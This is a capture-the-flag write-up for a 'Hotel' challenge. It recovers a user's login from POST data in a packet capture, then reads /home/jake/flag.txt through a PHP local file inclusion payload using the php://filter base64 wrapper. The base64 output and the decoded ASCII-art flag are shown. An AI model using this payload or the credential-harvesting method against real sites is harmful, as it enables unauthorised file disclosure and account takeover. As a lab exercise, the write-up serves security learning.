LUHack Writeup: Hotel

By: derbytron

12/04/2019

We're given a URL and a pcap file, being told that we have captured some traffic from "Jake". First thing we need to do is open the pcap in Wireshark. If we've captured traffic, hopefully it will include the username and password. Once in Wireshark we filter by http

Wireshark filtered by http

We're looking for POST requests, and more specifically, the data the contain. There are two in the screenshot above, the first one contains the following:

First POST request data

Unfortunately when we try this it doesn't work, so we see if the second one contains anything useful:

Second POST request data

It seems Jake had made a typo and not capitalised the first character in his password, this one works!

Screenshot of website after login

Once logged in it's time to look around. We were told to see if we can get to /home/jake/flag.txt, this is clearly a local file, so we need to check for local file inclusion techniques. There is a file upload within the recipes which seems lucrative however this isn't the way we managed to do it, we eventually managed to export the local file over base64 via the following URL:

<base_URL>/<page>.php?page=php://filter/convert.base64-encode/resource=/home/jake/flag.txt

This printed out the following:

CgoKCiAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgX18KICAgICAgICAgICAgICAgICAgLyBcLS0uLl9fX18KICAgICAgICAgICAgICAgICAgIFwgXCAgICAgICBcLS0tLS0sLCwuLgogICAgICAgICAgICAgICAgICAgIFwgXCAgICAgICBcICAgICAgICAgXC0tLCwuLgogICAgICAgICAgICAgICAgICAgICBcIFwgICAgICAgXCAgICAgICAgIFwgICwnCiAgICAgICAgICAgICAgICAgICAgICBcIFwgICAgICAgXCAgICAgICAgIFwgYGAuLgogICAgICAgICAgICAgICAgICAgICAgIFwgXCAgICAgICBcICAgICAgICAgXC0nJwogICAgICAgICAgICAgICAgICAgICAgICBcIFwgICAgICAgXF9fLCwtLScnJwogICAgICAgICAgICAgICAgICAgICAgICAgXCBcICAgICAgIFwuCiAgICAgICAgICAgICAgICAgICAgICAgICAgXCBcICAgICAgLC8KICAgICAgICAgICAgICAgICAgICAgICAgICAgXCBcX18uLi0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwgXAogICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwgXCAgICAgcGFjdGZ7bTB0ZWxfS2FMaWZvcm4xYX0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXCBcCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcIFwKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcIFwKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXCBcCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcIFwKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcIFwKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXCBcCgoK

Which looked like:

Screenshot of website after base64 export

When this was decoded from base64, we got the following:




                  
                   __
                  / \--..____
                   \ \       \-----,,,..
                    \ \       \         \--,,..
                     \ \       \         \  ,'
                      \ \       \         \ ``..
                       \ \       \         \-''
                        \ \       \__,,--'''
                         \ \       \.
                          \ \      ,/
                           \ \__..-
                            \ \
                             \ \     pactf{m0tel_KaLiforn1a}
                              \ \
                               \ \
                                \ \
                                 \ \
                                  \ \
                                   \ \
                                    \ \